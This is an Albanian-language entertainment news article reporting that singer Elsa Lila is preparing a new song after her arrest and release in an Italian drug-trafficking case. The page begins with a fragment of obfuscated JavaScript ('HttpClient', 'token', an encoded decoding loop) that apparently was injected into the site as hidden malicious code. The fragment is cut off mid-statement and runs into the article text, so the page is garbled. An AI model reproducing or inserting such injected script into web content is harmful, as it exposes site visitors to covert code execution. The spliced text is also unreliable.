;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pas akuzave për përfshirje në banda kriminale, Elsa Lila jep lajmin e ri

By

Këngëtarja e njohur shqiptare, Elsa Lila, ka nisur përgatitjet për rikthimin e saj në industrinë e muzikës.

Lila, e cila kohëve të fundit më shumë se për muzikë ishte në qendër të vëmendjes për shkak të arrestimit të saj për përfshirje në bandat kriminale të Italisë, ka paralajmëruar se është duke punuar për një këngë të re.

“Duke punuar për një këngë të re”, ka shkruar Lila në mbishkrimin e fotos të postuar në Instagram, njofton Klankosova.tv.

Artistja i është rikthyer edhe mediave sociale pas disa muajsh pauze, ndërsa ka ndarë me ndjekësit e vet edhe video nga performancat e saj në festivale të ndryshme ndër vite.

Rikthimi i Lilës u mirëprit nga audienca e përbërë nga fansat dhe kolegët e saj të cilët e përgëzuan për hapat e ndërmarrë.

Ndryshe, Elsa Lila ishte vënë në pranga nga policia italiane në Romë më 16 mars të këtij viti, pasi ata goditën një organizatë kriminale italo-shqiptare të shpërndarjes së drogës, të përbërë nga 13 persona, mes të cilëve ishte edhe artistja.

Aso kohe e përditshmja italiane “La Repubblica” kishte raportuar se e kishte si detyrë mbajtjen e llogarive. Por, ajo u lirua nga burgu disa javë më vonë për t’iu rikthyer jetës normale jashtë qelisë.

Artikuj të ngjashëm